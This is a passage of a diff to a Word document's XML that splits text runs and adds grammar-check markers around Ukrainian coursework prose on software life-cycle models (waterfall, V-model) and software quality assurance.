+        <w:t>для</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> тих проектів, які досить зрозумілі, але все ж важк</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1173,7 +1546,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона досить доступна дли розумінні, так як переслідується проста мета - виконати. необхідні дії;</w:t>
+        <w:t>вона досить доступна дли розумінні, так як переслі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>дується</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проста мета - виконати. необхідні дії;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1219,7 +1610,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>її структурою може керуватися навіть слабо підготовлений в технічному плані або недосвідчений персонал;</w:t>
+        <w:t xml:space="preserve">її структурою може керуватися навіть слабо </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідготовлений в технічному плані або недосвідчений персонал;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1242,7 +1651,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона відрізняється стабільністю требоваінй;</w:t>
+        <w:t>вона ві</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>др</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізняється стабільністю требоваінй;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1288,7 +1715,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Вона добре спрацьовує тоді, коли вимоги до якості домінують над вимогами до витрат і графіку виконання проекту;</w:t>
+        <w:t xml:space="preserve">Вона </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>добре</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> спрацьовує тоді, коли вимоги до якості домінують над вимогами до витрат і графіку виконання проекту;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1335,7 +1780,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>при правильному використанні моделі дефекти можна виявити на більш ранніх етапах, коли їх усунення ще не вимагає щодо великих витрат;</w:t>
+        <w:t xml:space="preserve">при правильному використанні моделі дефекти можна виявити </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>на б</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ільш ранніх етапах, коли їх усунення ще не вимагає щодо великих витрат;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1358,7 +1821,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона полегшує роботу менеджеру проекту зі складання плану і комплектації команди розробників;</w:t>
+        <w:t>вона полегшує роботу менеджеру проекту зі складання плану і комплектації команди розробникі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1381,7 +1862,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона дозволяє учасникам проекту, що завершив дії на виконуваної ними фазі, взяти участь в реалізації інших проектів;</w:t>
+        <w:t>вона дозволяє учасникам проекту, що завершив дії на виконуваної ними фазі, взяти участь в реалізації інших проекті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1404,7 +1903,61 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Вона визначає процедури з контролю за якістю. Кожні отримані дані піддаються огляду. Така процедура використовується командою розробників для визначення якості системи;</w:t>
+        <w:t xml:space="preserve">Вона визначає процедури з контролю </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>за</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> якістю. Кожні отримані дані </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>іддаються огляду. Така процедура використовується командою розробникі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для визначення якості системи;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1427,7 +1980,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>стадії моделі досить добре визначені і зрозумілі;</w:t>
+        <w:t xml:space="preserve">стадії моделі досить </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>добре</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> визначені і зрозумілі;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1538,7 +2109,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>відповідним для нас, виявляються такими недоліки:</w:t>
+        <w:t xml:space="preserve">відповідним для нас, виявляються </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>такими</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> недоліки:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2181,7 +2770,25 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>спрямованим на верифікацію і атестацію продукту. Вона демонструє, що тестування продукту обговорюється</w:t>
+        <w:t>спрямованим на верифікацію і атестацію продукту. Вона демонстру</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>є,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> що тестування продукту обговорюється</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2215,7 +2822,43 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи -на фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений пунктирною лінією між прямокутниками V-подібної моделі.</w:t>
+        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-н</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">а фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>пунктирною</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> лінією між прямокутниками V-подібної моделі.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2281,8 +2924,18 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>, була розроблена як р</w:t>
-      </w:r>
+        <w:t xml:space="preserve">, була розроблена як </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2298,7 +2951,61 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається після завершення отримання результативних даних попередньої фази. Модель демонструє комплексний підхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і фазами </w:t>
+        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ісля завершення отримання результативних даних попередньої фази. Модель демонструє комплексний </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фазами</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3142,7 +3849,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>в ній не враховані ітерації між фазами;</w:t>
+        <w:t xml:space="preserve">в ній не враховані ітерації </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>між</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> фазами;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3165,7 +3890,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>в моделі не передбачено внесення вимоги динамічних змін на різних етапах життєвого циклу;</w:t>
+        <w:t xml:space="preserve">в моделі не передбачено внесення вимоги динамічних змін на </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізних етапах життєвого циклу;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3188,7 +3931,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>тестування вимог в життєвому циклі відбувається занадто пізно, внаслідок чого неможливо внести зміни, які не вплинувши при цьому на графік виконання проекту;</w:t>
+        <w:t xml:space="preserve">тестування вимог в життєвому циклі відбувається занадто </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізно, внаслідок чого неможливо внести зміни, які не вплинувши при цьому на графік виконання проекту;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3211,7 +3972,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>в модель не входять дії, спрямовані на аналіз ризиків.</w:t>
+        <w:t>в модель не входять дії, спрямовані на аналіз ризикі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3237,13 +4016,23 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>З метою подолання цих недоліків V-образну модель можна модифікувати, включивши в неї ітераційні цикли, призначені для вирішення змін у вимогах за рамками фази аналізу.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>З</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> метою подолання цих недоліків V-образну модель можна модифікувати, включивши в неї ітераційні цикли, призначені для вирішення змін у вимогах за рамками фази аналізу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3286,7 +4075,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Планування, що полягає в підготовці плану робіт, в якому знаходять відображення вимоги до якості, розподіляються завдання між виконавцями, складаються графіки і розділяється відповідальність.</w:t>
+        <w:t xml:space="preserve">Планування, що полягає в </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідготовці плану робіт, в якому знаходять відображення вимоги до якості, розподіляються завдання між виконавцями, складаються графіки і розділяється відповідальність.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3304,6 +4111,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3312,6 +4120,7 @@
         </w:rPr>
         <w:t>Розробку стратегії, методів і процедур, що складається в створенні нормативних інструкцій, що охоплюють всі етапи проектування, в тому числі, встановлення вимог до системи, програмування, тестування відповідно до потреб конкретного проекту.</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3351,7 +4160,25 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>контролювати його відповідність встановленим вимогам, що стосуються ефективності функціонування і стандартів якості.</w:t>
+        <w:t xml:space="preserve">контролювати </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>його в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідповідність встановленим вимогам, що стосуються ефективності функціонування і стандартів якості.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3397,7 +4224,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Спостереження за випробуваннями програмних засобів, що припускає складання звітів про випробування з аналізом проблем, причин помилок і обгрунтованому коригувальних дій.</w:t>
+        <w:t>Спостереження за випробуваннями програмних засобів, що припускає складання звіті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> про випробування з аналізом проблем, причин помилок і обгрунтованому коригувальних дій.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3420,7 +4265,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Збереження робочої документації, що стосується звітів про проблеми проектування і програмування системи, контрольних прикладів, протоколів випробувань, тестових даних, оглядів якості та інших аспектів.</w:t>
+        <w:t>Збереження робочої документації, що стосується звітів про проблеми проектування і програмування системи, контрольних прикладів, протоколів випробувань, тестових даних, оглядів якості та інших аспекті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3496,8 +4359,20 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>ІВ</w:t>
-      </w:r>
+        <w:t>І</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>В</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4034,7 +4909,25 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Функціональність (functionality). Здатність ПЗ в певних умовах вирішувати завдання, потрібні користувачам. Визначає, що саме робить ПЗ, які завдання воно вирішує</w:t>
+        <w:t>Функціональність (functionality). Здатність ПЗ в певних умовах вирішувати завдання, потрібні користувачам. Визнача</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>є,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
